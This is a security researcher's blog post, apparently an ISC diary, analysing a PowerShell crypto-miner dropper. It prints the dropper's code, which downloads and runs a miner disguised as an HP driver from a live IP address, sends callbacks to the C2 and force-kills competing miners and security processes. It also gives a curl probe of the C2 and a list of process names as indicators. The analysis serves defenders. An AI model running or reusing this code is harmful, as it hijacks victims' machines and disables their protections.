I found an interesting piece of Powershell code yesterday. The purpose is to download and execute a crypto miner but the code also implements a detection mechanism to find other miners, security tools or greedy processes (in terms of CPU cycles). Indeed, crypto miners make intensive use of your CPUs and more CPU resources they can (ab)use, more money will be generated. When a computer is infected, it looks legit to search for already running miners and simply kill them: The fight for CPU cycles started!

The code is simple and downloads a crypto miner malware. Depending on the architecture, a 32bits or 64bits version of the miner is downloaded: (Note: the code has been beautified)

$HSST = "http://45.123.190.116"
$CALLBACK = $HSST
$DEFAULT_RFILE = "$HSST/files/hpw64"
$OTHERS_RFILE = "$HSST/files/hpw32"
$LFILE_NAME = "HPDriver.exe"
$LFILE_PATH = "$env:TMP\$LFILE_NAME"
$DOWNLOADER = New-Object System.Net.WebClient
$SYSTEM_BIT = [System.IntPtr]::Size
if ( $SYSTEM_BIT -eq 8 ) {
    $DOWNLOADER.DownloadFile($DEFAULT_RFILE, $LFILE_PATH)
} else {
    $DOWNLOADER.DownloadFile($OTHERS_RFILE, $LFILE_PATH)
}

The two files are already known on VT[1][2]. They are not signed but pretend to be an HP driver:

The miner configuration is hardcoded in the PE files and the account is still active today:

Then the script checks if a miner is already running by testing the presence of an ‘AMDDriver64’ process:

if ( !(Get-Process AMDDriver64 -ErrorAction SilentlyContinue) ) {
    $DOWNLOADER.DownloadString("$CALLBACK/?info=w0")
    cmd.exe /c "$LFILE_PATH -B"
} else {
    $DOWNLOADER.DownloadString("$CALLBACK/?info=w9")
}

I presume that the GET HTTP request is some kind of call-back to the C2. I did not get any information returned:

# torify curl -v -A "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0)" http://45.123.190.116/?info=w9
* Trying 45.123.190.116...
* TCP_NODELAY set
* Connected to 45.123.190.116 (45.123.190.116) port 80 (#0)
> GET /?info=w9 HTTP/1.1
> Host: 45.123.190.116
> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0)
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.10.3 (Ubuntu)
< Date: Sun, 04 Mar 2018 09:31:25 GMT
< Content-Type: text/html
< Content-Length: 0
< Last-Modified: Thu, 01 Mar 2018 09:15:51 GMT
< Connection: keep-alive
< ETag: "5a97c4c7-0"
< Accept-Ranges: bytes
<
* Connection #0 to host 45.123.190.116 left intact

But the most interesting part is the following. The script lists all running processes and kills unwanted ones:

$counters = (Get-Counter '\Process(*)\% Processor Time').CounterSamples
$malwares = [redacted]
$malwares2 = "Silence","Carbon","xmrig32","nscpucnminer64","mrservicehost","servisce","svchosts3","svhosts","system64","systemiissec", \
"taskhost","vrmserver","vshell","winlogan","winlogo","logon","win1nit","wininits","winlnlts","taskngr","tasksvr","mscl","cpuminer","sql31", \
"taskhots", "svchostx","xmr86","xmrig","xmr","win1ogin","win1ogins","ccsvchst","nscpucnminer64","update_windows"
foreach ($counter in $counters) {
  if ($counter.CookedValue -ge 40) {
    if ($counter.InstanceName -eq "idle" -Or $counter.InstanceName -eq "_total") {
      continue
    }
    foreach ($malware in $malwares) {
      if ($counter.InstanceName -eq $malware) {
        Stop-Process -processname $counter.InstanceName -Force
      }
    }
  }
  foreach ($malware2 in $malwares2) {
    if ($counter.InstanceName -eq $malware2) {
      Stop-Process -processname $counter.InstanceName -Force
    }
  }
}

The list ‘$malwares’ contains well-known processes but the list “$malwares2” contains interesting processes used by other crypto miners. This list could be used to build a list of IOC’s:

Silence
Carbon
xmrig32
nscpucnminer64
mrservicehost
servisce
svchosts3
svhosts
system64
systemiissec
taskhost
vrmserver
vshell
winlogan
winlogo
logon
win1nit
wininits
winlnlts
taskngr
tasksvr
mscl
cpuminer
sql31
taskhots
svchostx
xmr86
xmrig
xmr
win1ogin
win1ogins
ccsvchst
nscpucnminer64
update_windows

If you find one of these processes on a host, there are chances that it is being used to mine cryptocurrencies!

[1] https://www.virustotal.com/#/file/3d8a6698ab0512ddf0c42826a570c2f82e3ec5e0f415538232353df937508042/detection
[2] https://www.virustotal.com/#/file/9e5535ee79e9d79f2a33a57cc3f0f1e060dd854aac2f6d1e3a38a9fe927cdc73/detection

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key